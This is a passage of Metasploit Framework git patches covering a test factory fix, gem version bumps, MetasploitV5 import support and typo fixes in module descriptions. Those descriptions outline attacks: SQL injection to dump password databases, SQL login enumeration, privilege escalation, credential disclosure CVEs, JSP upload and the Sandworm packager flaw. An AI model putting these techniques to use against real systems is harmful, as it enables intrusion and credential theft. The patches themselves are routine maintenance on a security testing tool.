Rex::Text.to_unicode(file_name) ole_data = file_info + extract_info + file + append_info ole_contents = [ole_data.length].pack('V') + ole_data From ccc5bbd745815efe3b0005288e3f3f5455f4d5ba Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 13 Nov 2014 10:58:03 -0600 Subject: [PATCH 33/38] this spec needs to use the username factory :metasploit-credential_public factory will randomly return either a Username or BlankUsername and thus is not appropriate for when you want tos et an explicit Username. The :metasploit_credential_username factory should be used for this instead MSP-11609 --- spec/lib/msf/ui/command_dispatcher/db_spec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/spec/lib/msf/ui/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/command_dispatcher/db_spec.rb index a200918f6c..df1ab1c627 100644 --- a/spec/lib/msf/ui/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/command_dispatcher/db_spec.rb @@ -25,7 +25,7 @@ describe Msf::Ui::Console::CommandDispatcher::Db do context "when a core already exists" do before(:each) do priv = FactoryGirl.create(:metasploit_credential_password, data: password) - pub = FactoryGirl.create(:metasploit_credential_public, username: username) + pub = FactoryGirl.create(:metasploit_credential_username, username: username) core = FactoryGirl.create(:metasploit_credential_core, origin: FactoryGirl.create(:metasploit_credential_origin_import), private: priv, From 49f10e6ed880cb943d1f954419c7f1abae766463 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Thu, 13 Nov 2014 11:26:05 -0600 Subject: [PATCH 34/38] use latest version of metasploit-credential MSP-11609 --- Gemfile | 1 + Gemfile.lock | 25 ++++++++++++++++--------- metasploit-framework-db.gemspec | 3 ++- 3 files changed, 19 insertions(+), 10 deletions(-) diff --git a/Gemfile b/Gemfile index a53da0b5d0..653f766f60 100755 --- a/Gemfile +++ b/Gemfile @@ -5,6 +5,7 @@ gemspec name: 'metasploit-framework' group :db do gemspec name: 'metasploit-framework-db' + gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential.git', branch: 'bug/MSP-11609/blank-username-failure' end group :development do diff --git a/Gemfile.lock b/Gemfile.lock index 8e20637455..eeebf69c23 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,3 +1,17 @@ +GIT + remote: https://github.com/rapid7/metasploit-credential.git + revision: b5c36d0df013969df64625cfe23bd9a0ab3d2ee6 + branch: bug/MSP-11609/blank-username-failure + specs: + metasploit-credential (0.13.3.pre.blank.pre.username.pre.failure) + metasploit-concern (~> 0.3.0) + metasploit-model (~> 0.28.0) + metasploit_data_models (~> 0.21.0) + pg + railties (< 4.0.0) + rubyntlm + rubyzip (~> 1.1) + PATH remote: . specs: @@ -22,7 +36,7 @@ PATH tzinfo metasploit-framework-db (4.10.1.pre.dev) activerecord (< 4.0.0) - metasploit-credential (~> 0.13.0) + metasploit-credential metasploit-framework (= 4.10.1.pre.dev) metasploit_data_models (~> 0.21.1) pg (>= 0.11) @@ -112,14 +126,6 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) - metasploit-credential (0.13.2) - metasploit-concern (~> 0.3.0) - metasploit-model (~> 0.28.0) - metasploit_data_models (~> 0.21.0) - pg - railties (< 4.0.0) - rubyntlm - rubyzip (~> 1.1) metasploit-model (0.28.0) activesupport railties (< 4.0.0) @@ -233,6 +239,7 @@ DEPENDENCIES factory_girl (>= 4.1.0) factory_girl_rails fivemat (= 1.2.1) + metasploit-credential! metasploit-framework! metasploit-framework-db! metasploit-framework-pcap! diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 4583476747..7a9b6b99ee 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec @@ -31,7 +31,8 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', rails_version_constraint # Metasploit::Credential database models - spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.0' + #spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' + spec.add_runtime_dependency 'metasploit-credential' # DELETE this before landing # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1' # depend on metasploit-framewrok as the optional gems are useless with the actual code From 768d7477d7b34b96f71995fe7d2b33a2475ca05c Mon Sep 17 00:00:00 2001 From: Samuel Huckins Date: Thu, 13 Nov 2014 12:56:58 -0600 Subject: [PATCH 35/38] metasploit-credential bump to 0.13.3 MSP-11609 --- Gemfile | 1 - Gemfile.lock | 25 +++++++++---------------- metasploit-framework-db.gemspec | 3 +-- 3 files changed, 10 insertions(+), 19 deletions(-) diff --git a/Gemfile b/Gemfile index 653f766f60..a53da0b5d0 100755 --- a/Gemfile +++ b/Gemfile @@ -5,7 +5,6 @@ gemspec name: 'metasploit-framework' group :db do gemspec name: 'metasploit-framework-db' - gem 'metasploit-credential', git: 'https://github.com/rapid7/metasploit-credential.git', branch: 'bug/MSP-11609/blank-username-failure' end group :development do diff --git a/Gemfile.lock b/Gemfile.lock index eeebf69c23..12ae7c980e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,17 +1,3 @@ -GIT - remote: https://github.com/rapid7/metasploit-credential.git - revision: b5c36d0df013969df64625cfe23bd9a0ab3d2ee6 - branch: bug/MSP-11609/blank-username-failure - specs: - metasploit-credential (0.13.3.pre.blank.pre.username.pre.failure) - metasploit-concern (~> 0.3.0) - metasploit-model (~> 0.28.0) - metasploit_data_models (~> 0.21.0) - pg - railties (< 4.0.0) - rubyntlm - rubyzip (~> 1.1) - PATH remote: . specs: @@ -36,7 +22,7 @@ PATH tzinfo metasploit-framework-db (4.10.1.pre.dev) activerecord (< 4.0.0) - metasploit-credential + metasploit-credential (~> 0.13.3) metasploit-framework (= 4.10.1.pre.dev) metasploit_data_models (~> 0.21.1) pg (>= 0.11) @@ -126,6 +112,14 @@ GEM metasploit-concern (0.3.0) activesupport (~> 3.0, >= 3.0.0) railties (< 4.0.0) + metasploit-credential (0.13.3) + metasploit-concern (~> 0.3.0) + metasploit-model (~> 0.28.0) + metasploit_data_models (~> 0.21.0) + pg + railties (< 4.0.0) + rubyntlm + rubyzip (~> 1.1) metasploit-model (0.28.0) activesupport railties (< 4.0.0) @@ -239,7 +233,6 @@ DEPENDENCIES factory_girl (>= 4.1.0) factory_girl_rails fivemat (= 1.2.1) - metasploit-credential! metasploit-framework! metasploit-framework-db! metasploit-framework-pcap! diff --git a/metasploit-framework-db.gemspec b/metasploit-framework-db.gemspec index 7a9b6b99ee..a91c98e6af 100644 --- a/metasploit-framework-db.gemspec +++ b/metasploit-framework-db.gemspec @@ -31,8 +31,7 @@ Gem::Specification.new do |spec| spec.add_runtime_dependency 'activerecord', rails_version_constraint # Metasploit::Credential database models - #spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' - spec.add_runtime_dependency 'metasploit-credential' # DELETE this before landing + spec.add_runtime_dependency 'metasploit-credential', '~> 0.13.3' # Database models shared between framework and Pro. spec.add_runtime_dependency 'metasploit_data_models', '~> 0.21.1' # depend on metasploit-framewrok as the optional gems are useless with the actual code From 0959ef3d13279f88f0e6171aa068b25026c84a14 Mon Sep 17 00:00:00 2001 From: Trevor Rosen Date: Thu, 13 Nov 2014 13:01:55 -0600 Subject: [PATCH 36/38] Fixes lack of support for MetasploitV5 tag #4184 * Appears to have been overlooked somehow in the pre-BlackHat crunch * V5 will not support credentials * We are implementing full-workspace zip import/export for credentials --- lib/msf/core/db_manager/import.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/lib/msf/core/db_manager/import.rb b/lib/msf/core/db_manager/import.rb index e183dda908..0a03a656a9 100644 --- a/lib/msf/core/db_manager/import.rb +++ b/lib/msf/core/db_manager/import.rb @@ -302,6 +302,9 @@ module Msf::DBManager::Import when /MetasploitV4/ @import_filedata[:type] = "Metasploit XML" return :msf_xml + when /MetasploitV5/ + @import_filedata[:type] = "Metasploit XML" + return :msf_xml when /netsparker/ @import_filedata[:type] = "NetSparker XML" return :netsparker_xml From dd1920edd6bc8e79bd4c252a3a0ae75372a806fc Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 13 Nov 2014 14:48:23 -0600 Subject: [PATCH 37/38] Minor typos and grammar fixes --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 6 +++--- modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb | 2 +- .../auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb | 2 +- modules/auxiliary/gather/eventlog_cred_disclosure.rb | 4 ++-- .../exploits/multi/http/visual_mining_netcharts_upload.rb | 2 +- .../exploits/windows/fileformat/ms14_064_packager_python.rb | 4 ++-- .../windows/fileformat/ms14_064_packager_run_as_admin.rb | 4 ++-- 8 files changed, 13 insertions(+), 13 deletions(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index c0349c53c0..a9e33a2dfc 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary ManageEngine Password Manager Pro (PMP) has an authenticated blind SQL injection vulnerability in SQLAdvancedALSearchResult.cc that can be abused to escalate privileges and obtain Super Administrator access. A Super Administrator can then - use its privileges to dump the whole password database in CSV format. PMP can use + use his privileges to dump the whole password database in CSV format. PMP can use both MySQL and PostgreSQL databases but this module only exploits the latter as MySQL does not support stacked queries with Java. PostgreSQL is the default database in v6.8 and above, but older PMP versions can be upgraded and continue using MySQL, diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index 080945eac1..5500d48a11 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -18,10 +18,10 @@ class Metasploit3 < Msf::Auxiliary Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is - pretty simple, because the principal ids assigned to logins are incremental. Once logins + pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is - important, because not all of the principal ids resolve to SQL logins. Some resolve to - roles etc. Once logins have been enumerated they can be used in dictionary attacks. + important, because not all of the principal IDs resolve to SQL logins (some resolve to + roles instead) Once logins have been enumerated, they can be used in dictionary attacks. }, 'Author' => ['nullbind '], 'License' => MSF_LICENSE, diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb index 7b13036a27..2a8a11b1ca 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Microsoft SQL Server - Escalate EXECUTE AS', 'Description' => %q{ This module can be used escalate privileges if the IMPERSONATION privilege has been - assigned to the user. In most cases this results in additional data access, but in + assigned to the user. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. }, 'Author' => ['nullbind '], diff --git a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb index db05beb574..e2f781eb4f 100644 --- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb +++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Microsoft SQL Server - SQLi Escalate Execute As', 'Description' => %q{ This module can be used escalate privileges if the IMPERSONATION privilege has been - assigned to the user via error based SQL injection. In most cases this results in + assigned to the user via error based SQL injection. In most cases, this results in additional data access, but in some cases it can be used to gain sysadmin privileges. The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];-- }, diff --git a/modules/auxiliary/gather/eventlog_cred_disclosure.rb b/modules/auxiliary/gather/eventlog_cred_disclosure.rb index 217cd949c0..465db22b7b 100644 --- a/modules/auxiliary/gather/eventlog_cred_disclosure.rb +++ b/modules/auxiliary/gather/eventlog_cred_disclosure.rb @@ -19,8 +19,8 @@ class Metasploit3 < Msf::Auxiliary allow an unauthenticated user to obtain the superuser password of any managed Windows and AS/400 hosts. This module abuses both vulnerabilities to collect all the available usernames and passwords. First the agentHandler servlet is abused to get the hostid and - slid of each device (CVE-2014-6038); then these numeric id's are used to extract usernames - and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7 + slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames + and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7, the TARGETURI has to be prepended with /event. }, 'Author' => diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index a2f131a062..9c4c7972c0 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote First, a lack of input validation in the administration console permits arbitrary jsp code upload to locations accessible later through the web service. Authentication is typically required, however a 'hidden' user is - available by default (and non editable). This user, named 'Scheduler', + available by default (and non-editable). This user, named 'Scheduler', can only login to the console after any modification in the user database (a user is added, admin password is changed etc). If the 'Scheduler' user isn't available valid credentials must be supplied. The diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb index 3b5bf12fb1..28d2b86bf8 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_python.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_python.rb @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote publicly known as "Sandworm", on systems with Python for Windows installed. Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows platforms running - Office 2013 and Office 2010 SP2. And please keep in mind that some other setups such as - using Office 2010 SP1 might be less stable, and sometimes may end up with a crash due to a + Office 2013 and Office 2010 SP2. Please keep in mind that some other setups such as + those using Office 2010 SP1 may be less stable, and may end up with a crash due to a failure in the CPackage::CreateTempFileName function. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb index 3ae471c636..fdacc4d83b 100644 --- a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb @@ -20,8 +20,8 @@ class Metasploit3 < Msf::Exploit::Remote The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known to be vulnerable. However, based on our testing, the most reliable setup is on Windows - platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other - setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a + platforms running Office 2013 and Office 2010 SP2. Please keep in mind that some other + setups such as using Office 2010 SP1 might be less stable, and may end up with a crash due to a failure in the CPackage::CreateTempFileName function. }, 'License' => MSF_LICENSE, From e2dc862121caf539fc831e63cbeab47914172b9f Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Thu, 13 Nov 2014 14:53:57 -0600 Subject: [PATCH 38/38] Fix newly introduced typo. --- modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb index 5500d48a11..dd90b59eef 100644 --- a/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb +++ b/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb @@ -21,7 +21,7 @@ class Metasploit3 < Msf::Auxiliary pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to - roles instead) Once logins have been enumerated, they can be used in dictionary attacks. + roles instead). Once logins have been enumerated, they can be used in dictionary attacks. }, 'Author' => ['nullbind '], 'License' => MSF_LICENSE,